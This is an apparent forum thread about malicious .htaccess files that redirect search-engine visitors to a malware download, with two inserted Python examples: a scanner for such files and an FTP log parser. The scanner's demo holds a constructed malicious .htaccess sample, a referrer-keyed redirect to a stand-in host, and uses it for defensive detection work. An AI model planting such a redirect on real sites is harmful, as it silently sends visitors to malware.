.htaccess file appearing on my web server account


18 replies to this topic

#1 Gutsy
  • Members
  • 10 posts
  • Location: New Jersey

Posted 04 November 2010 - 07:10 PM

Hello,

I have a Windows XP machine, and I posted my request for help on Nutnworks about a week ago. I have AVG Anti-Virus version 9, and I routinely have it update and scan automatically. I sent you the zipped .htaccess file today.

I design web sites, and one of my web site owners/clients indicated that when he searched for his site on Google and then clicked on the Google link to his site, a pop-up appeared to download a binary DOS file. This also happens when using other search engine sites (AOL, MSN, AltaVista, etc.). Once you click off the pop-up it never appears again, and the link correctly goes to the web page listed.

My host checked my account and said there were over 300 malicious .htaccess files they had to remove from the server across all of my client web sites. They recommended that I have my PC scanned for viruses or malware because they suspected the program has all my passwords for FTP access to the web pages. I changed all my server passwords online using another PC.

I worked with Tom K at Nutnworks for a couple of days, with 6 software downloads to scan everything, and my machine was clean last weekend. However, the .htaccess files have returned to the server even though I changed "all" my passwords. I wrote to the host tech about this and asked him to look at the .htaccess file, and he sent the following reply:

"This new .htaccess is indeed malicious - it is redirecting people to the same malware site as before.

It does look like only the .htaccess in the "deco" account is infected. The only accounts on our server that are having this problem are the ones owned underneath your reseller account, so it continues to look like a piece of malware on the computer you are accessing from that is allowing this to happen."


So I wrote to Tom K again about it. He asked me to send the file to Grinler (because I was having problems sending it to Little Eagle at Nutnworks; I was getting a server error) for analysis, and that's where I stand at this time.

After writing to Grinler today I manually went into my 22 client accounts and removed about 60 or so .htaccess files (all the malicious files are 4k in size); however, I did not remove those that I created to access certain secure directories. At this point all my client accounts are clean. I'm just not sure if I have "anything" on my machine that could cause the files to reappear. Most of the .htaccess files were dated 10/20/10; however, they were all removed by my host just last Friday, and I changed all my passwords right after they confirmed they were deleted.

Tom gave me several links referring to the .htaccess files:

A link to a guy who has written a .PHP script to help with cleaning it off: http://alvinjiang.blogspot.com/2010/...to-remove.html

A link to a blog from a lady who had the issue:

Tom said if I do a Google search on "exgocgkctswo", I would be able to find many other site designers that have been hit like myself. For example, this gal has posted the identical code: http://forum.joomla.org/viewtopic.php?p=2260567 You may also notice that this .htaccess code will come up on the search engine for a variety of sites (NASCAR, real estate, etc.), which leads me to believe that their sites are currently infiltrated with this garbage.

Is there anything you can suggest to keep this from happening again, other than changing my passwords periodically? Is there a program I can use to scan my sites to ensure everything is gone?

Thank you in advance!
Dave

Edited by Gutsy, 04 November 2010 - 07:11 PM.
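The behaviour described in this post (a search-engine visitor gets redirected to a download, a direct visitor sees the normal page, and the planted files sit beside legitimate access-control .htaccess files) is what a scan of the web root should key on. The following is an added example, not code from this thread, its participants or the host: it walks a directory tree, flags .htaccess files whose RewriteCond tests HTTP_REFERER against search-engine names or whose rewrite/redirect target points at a host you do not own, and also reports zero-byte .htaccess files. The sample files and the host names redirector.invalid and example.com are constructed for the demo; they are not the files or hosts from the thread.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Search engines named in the thread, plus a few obvious peers. A referrer-keyed
# redirect only fires for visitors arriving from these, which is why the site
# owner sees nothing when he types the URL directly.
SEARCH_ENGINE_RE = re.compile(r"google|msn|aol|altavista|yahoo|bing", re.I)
# Any absolute URL in a rewrite or redirect target; group 1 is the host.
ABSOLUTE_URL_RE = re.compile(r"https?://([^/\s\]]+)", re.I)


def classify_htaccess(text: str, own_hosts: set[str]) -> list[str]:
    """Return findings for one .htaccess body; an empty list means nothing suspicious.

    Flags (a) RewriteCond lines that test HTTP_REFERER against search-engine names
    and (b) RewriteRule/Redirect/ErrorDocument targets on a host not in own_hosts.
    Access-control directives (AuthType, Require, deny from ...) are never flagged,
    so the OP's own directory-protection files pass through untouched.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        upper = line.upper()
        if upper.startswith("REWRITECOND") and "HTTP_REFERER" in upper and SEARCH_ENGINE_RE.search(line):
            findings.append("referrer condition on search engines: " + line)
        if upper.startswith(("REWRITERULE", "REDIRECT", "ERRORDOCUMENT")):
            m = ABSOLUTE_URL_RE.search(line)
            if m and m.group(1).lower() not in own_hosts:
                findings.append("redirect to external host %s: %s" % (m.group(1), line))
    return findings


def scan_webroot(root: Path, own_hosts: set[str]) -> dict[str, list[str]]:
    """Walk root and return {relative path: findings} for every .htaccess worth a look.

    Zero-byte files are reported as well: the thread describes empty .htaccess
    files reappearing after the 4k malicious ones were removed.
    """
    report = {}
    for path in sorted(root.rglob(".htaccess")):
        rel = str(path.relative_to(root))
        if path.stat().st_size == 0:
            report[rel] = ["empty .htaccess (0 bytes)"]
            continue
        findings = classify_htaccess(path.read_text(errors="replace"), own_hosts)
        if findings:
            report[rel] = findings
    return report


# Constructed samples for the demo; not the files from the thread.
MALICIOUS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|msn|aol|altavista)\\. [NC]
RewriteRule .* http://redirector.invalid/go.php [R=302,L]
"""
BENIGN = """\
AuthType Basic
AuthName "Client area"
AuthUserFile /home/example/.htpasswd
Require valid-user
"""


def demo() -> dict[str, list[str]]:
    """Build a throwaway tree holding the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "public_html").mkdir()
        (root / "public_html" / ".htaccess").write_text(MALICIOUS)
        (root / "public_html" / "private").mkdir()
        (root / "public_html" / "private" / ".htaccess").write_text(BENIGN)
        (root / "public_html" / "img").mkdir()
        (root / "public_html" / "img" / ".htaccess").write_text("")
        return scan_webroot(root, {"www.example.com", "example.com"})


if __name__ == "__main__":
    for rel, findings in demo().items():
        print(rel)
        for finding in findings:
            print("   ", finding)
```

Run it against a real account by calling scan_webroot(Path("/home/<account>"), {"<your domains>"}) instead of demo(). Review anything it reports by hand before deleting; a referrer check on its own is not proof of compromise, but a referrer check paired with a redirect to a host you do not control is exactly the pattern the host described.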



#2 cryptodan (Bleepin Madman)
  • Members
  • 21,868 posts
  • Location: Catonsville, Md

Posted 04 November 2010 - 07:16 PM

You need to make sure that your PHP scripts are clean, and may I ask what software you are running on the site?

I had this same issue and found that I had a vulnerable PHP script. Since that day I have updated the software, and there have been no more issues.

#3 Grinler (Lawrence Abrams)
  • Admin
  • 43,665 posts
  • Location: USA

Posted 04 November 2010 - 10:31 PM

Are all of the sites that seem to be affected running Joomla? My guess is that this is not a virus on the server, but rather a hack on the server.

Linux or Windows server?

#4 Gutsy (Topic Starter)
  • Members
  • 10 posts
  • Location: New Jersey

Posted 05 November 2010 - 10:58 AM

Thanks for getting back to me, cryptodan and Grinler.

I do run a few PHP scripts on several sites and I'm hoping that they are clean. How would I know that they are clean?

I contacted the host this morning and told him that I removed all the problem .htaccess (4k) files manually yesterday, and this morning blank .htaccess (0k) files have appeared in the root directory. Not sure if this is a hack with 0k (nothing in the file) or not. He responded with the following:

Basically, the problem isn't so much that the .htaccess files are there at any given time, it is that they are re-appearing at will. They are being uploaded from the same IP address that you are accessing cPanel/ftp with which is a clear indication that your computer has some kind of infection. If the anti-malware solutions you are using are not detecting something, it does not mean that your computer is clean of malware - it simply means the companies behind the product have not identified the malware already and been able to come up with a signature and fix for it. My personal recommendation is to reinstall whenever a PC infection occurs, because you never know if your system has actually been cleaned.

Per the above ... is there malware out there that will identify the fingerprints of the .htaccess hack?

Thanks in advance for any assistance you can offer! Appreciate it!

#5 Grinler (Lawrence Abrams)
  • Admin
  • 43,665 posts
  • Location: USA

Posted 05 November 2010 - 11:32 AM

Can you PM me some of the logs? Request the logs showing what they are seeing.

I know of no malware that accesses ftp or cpanel and uploads htaccess files.

We need to know from the logs, if they are being created via cpanel or via ftp.

#6 Gutsy (Topic Starter)
  • Members
  • 10 posts
  • Location: New Jersey

Posted 15 November 2010 - 07:57 PM

Grinler,

Thanks for getting back to me, and sorry for the late reply. The .htaccess files showed up again on over a dozen of my client accounts, but with 0 bytes.

I asked my host for the logs for my accounts, and here is the address they provided showing all the .htaccess files being uploaded and downloaded.

Search for .htaccess in this FTP activity log:
https://ax56.genwebserver.com/dsereni.txt

My host said the following in his reply to me:
You'll see the accounts are being hit from a few different locations, with the account password. Realistically there are two scenarios that could be causing this - one being that your home network is being compromised and the passwords are being stolen in transit (known as a man-in-the-middle attack) or that the passwords are being logged by a piece of malware on the computer and being transmitted to a command/control center to coordinate this. The second is the most likely.

Thanks again in advance for any advice you can offer.
Dave

#7 NpaMA
  • Members
  • 635 posts
  • Location: Memphis, TN

Posted 17 November 2010 - 02:04 AM

Would it be possible to disable the PHP scripts/installs to see if they reappear? From what I've seen it's normally exploited scripts on the server causing this. Although the "uploading from your IP" is a bit odd.

#8 cryptodan (Bleepin Madman)
  • Members
  • 21,868 posts
  • Location: Catonsville, Md

Posted 17 November 2010 - 06:10 AM

Do you allow anonymous FTP?

#9 Gutsy (Topic Starter)
  • Members
  • 10 posts
  • Location: New Jersey

Posted 18 November 2010 - 08:44 AM

Hello NpaMA and Bleepin,

Thank you both for your responses.

NpaMA: I have 10 (out of 22) clients for whom I've installed PHP scripts that run slide shows, their email, and online calendars using a database. Disabling them would be a real issue for them and a real headache/problem for me. I do, however, believe the scripts are fine. I will contact the vendor I purchased many of the scripts from, www.phpjabbers.com, and see if they know of any security issues.

Bleepin: I do not access the server using the anonymous FTP setting. Or are you referring to the server allowing it?

Thanks again!

#10 cryptodan (Bleepin Madman)
  • Members
  • 21,868 posts
  • Location: Catonsville, Md

Posted 18 November 2010 - 11:05 AM

Oct 20 02:42:22 ax56 pure-ftpd: (?@212.117.165.214) [INFO] action is now logged in

See the ? before the @ symbol?

To me that indicates anonymous FTP Log in.

Do you have the following accounts on your FTP:

action
aeconstr
borden
country
curriers

You see a pattern there?

It seems as though you have no password control on your FTP whatsoever, or they are exploiting holes.

At this point and time, I would recommend switching hosts.

#11 Grinler (Lawrence Abrams)
  • Admin
  • 43,665 posts
  • Location: USA

Posted 18 November 2010 - 03:35 PM

The ? symbol in front is just because it's the login stage and the ftpd server does not yet know the user associated with the connection. Notice that once they log in it changes to loginname@ for each log entry.

These IP addresses: do you recognize them, or know who they belong to?

212.117.165.214
71.168.234.34
160.93.44.199
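The two posts above disagree on how to read the pure-ftpd log, and the thread's eventual answer came from correlating account logins with source addresses. The following is an added example, not code posted by anyone in the thread: a small parser for pure-ftpd syslog lines that follows Grinler's reading (the user slot holds "?" until the login completes, then the account name), collects which addresses each account was logged into from, lists every .htaccess written over FTP, and reports accounts touched from addresses outside a known-good set. The sample log is constructed to follow the shape of the single line quoted in post #10; its IP addresses are RFC 5737 documentation addresses, not the ones listed above, and the upload lines assume pure-ftpd's "<path> uploaded (<n> bytes, ...)" NOTICE format.

```python
import re
from collections import defaultdict

# Syslog line as written by pure-ftpd: "(user@ip)" precedes the message. Before
# the USER/PASS exchange finishes the user slot holds "?", afterwards the account.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) pure-ftpd: "
    r"\((?P<user>[^@)]+)@(?P<ip>[^)]+)\) \[(?P<level>\w+)\] (?P<msg>.*)$"
)
LOGIN_RE = re.compile(r"^(?P<account>\S+) is now logged in$")
UPLOAD_RE = re.compile(r"^(?P<path>\S+) uploaded\s+\((?P<bytes>\d+) bytes")


def parse_line(line):
    """Split one log line into its fields, or return None for anything else."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def logins_by_account(lines):
    """{account: {ip, ...}} built from the '<account> is now logged in' events.

    The login event still carries '?' as the user, so the account name is taken
    from the message text, not from the user slot.
    """
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        m = LOGIN_RE.match(rec["msg"])
        if m:
            seen[m.group("account")].add(rec["ip"])
    return dict(seen)


def htaccess_uploads(lines):
    """(account, ip, path, bytes) for every .htaccess written over FTP."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        m = UPLOAD_RE.match(rec["msg"])
        if m and m.group("path").rsplit("/", 1)[-1] == ".htaccess":
            out.append((rec["user"], rec["ip"], m.group("path"), int(m.group("bytes"))))
    return out


def logins_from_unknown_ips(lines, known_ips):
    """Accounts logged into from an address outside known_ips, with those addresses."""
    result = {}
    for account, ips in logins_by_account(lines).items():
        unknown = ips - set(known_ips)
        if unknown:
            result[account] = unknown
    return result


# Constructed sample log (documentation addresses; not the thread's real log).
# 198.51.100.20 plays the designer's own connection; 203.0.113.7 is the outsider.
SAMPLE_LOG = """
Oct 20 02:42:22 ax56 pure-ftpd: (?@203.0.113.7) [INFO] New connection from 203.0.113.7
Oct 20 02:42:22 ax56 pure-ftpd: (?@203.0.113.7) [INFO] action is now logged in
Oct 20 02:42:23 ax56 pure-ftpd: (action@203.0.113.7) [NOTICE] /home/action//public_html/.htaccess uploaded  (4096 bytes, 12.3KB/sec)
Oct 20 02:42:24 ax56 pure-ftpd: (action@203.0.113.7) [INFO] Logout.
Oct 20 09:15:01 ax56 pure-ftpd: (?@198.51.100.20) [INFO] borden is now logged in
Oct 20 09:15:05 ax56 pure-ftpd: (borden@198.51.100.20) [NOTICE] /home/borden//public_html/index.html downloaded  (2048 bytes, 40.0KB/sec)
Oct 21 11:03:40 ax56 pure-ftpd: (?@203.0.113.7) [INFO] borden is now logged in
Oct 21 11:03:41 ax56 pure-ftpd: (borden@203.0.113.7) [NOTICE] /home/borden//public_html/.htaccess uploaded  (4096 bytes, 9.8KB/sec)
""".strip().splitlines()


if __name__ == "__main__":
    print("logins:", logins_by_account(SAMPLE_LOG))
    print(".htaccess uploads:", htaccess_uploads(SAMPLE_LOG))
    print("from unknown IPs:", logins_from_unknown_ips(SAMPLE_LOG, {"198.51.100.20"}))
```

Feed it the host's log with open(path).read().splitlines() and your own addresses as known_ips; a valid-password login from an address you do not recognise, followed seconds later by a .htaccess upload, is the credential-theft pattern the host described, and the account list it produces is the list of passwords that need to be rotated from a machine you trust.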

#12 Romeo29 (Learning To Bleep)
  • Members
  • 3,194 posts
  • Location: 127.0.0.1

Posted 21 November 2010 - 07:17 PM

Some of the domains controlled by the OP are still infected (just checked before posting). If this goes on like this then I am afraid Google will blacklist them soon.

In my opinion, the download server (of the malware) is changed every few days by uploading a new .htaccess file or by redirecting from the old server to new locations. The downloaded file is a packed EXE malware, and many leading antivirus vendors (Symantec, McAfee, Kaspersky, Panda, etc.) were not able to detect it.

Here is the VirusTotal report: http://www.virustotal.com/file-scan/report.html?id=c4e634edbce2f42ed1a1edefbcf10c87d5e93c53a142aff9fab88e0ca3916846-1290383589

The OP should be telling all his/her customers (and their visitors) to scan their computers with updated anti-virus products.


Edited by Romeo29, 22 November 2010 - 11:32 AM.


#13 Gutsy (Topic Starter)
  • Members
  • 10 posts
  • Location: New Jersey

Posted 22 November 2010 - 11:02 AM

Hello Grinler & Romeo29,

These two are mine:
71.168.234.34
160.93.44.199

IP 212.117.165.214 is from overseas? Probably the culprit?

Romeo: I just scanned a few of my sites on the virustotal.com site, including the one you scanned, "SMUPA.COM", and they are showing as clean, with no results for all the search engines listed.

I just searched a dozen of my client sites and the .htaccess file is no longer reappearing. I'm wondering if my hosting company found the cause and corrected the situation? I doubt they would admit it.

I'll keep you posted if anything appears or if I learn anything new.

Thank you again for your thoughts and advice on this issue.

Edited by Gutsy, 22 November 2010 - 11:02 AM.


#14 Romeo29 (Learning To Bleep)
  • Members
  • 3,194 posts
  • Location: 127.0.0.1

Posted 22 November 2010 - 11:44 AM

Hello Gutsy,
I did not find the malware on the www.smupa.com site itself. But the site smupa.com redirected to another site, which redirected to another one, and a malware file was downloaded. The malware file was named smupa.com.
It is good that the .htaccess is no longer there :)

#15 Grinler (Lawrence Abrams)
  • Admin
  • 43,665 posts
  • Location: USA

Posted 22 November 2010 - 12:47 PM

This was definitely a case of either the site being hacked or the server being hacked.

Also, these types of exploit kits won't attempt to infect/redirect you twice. Once a cookie is added it does not try again.

You may want to run a few virus scans on your computer to be safe as well as let your clients know the situation.



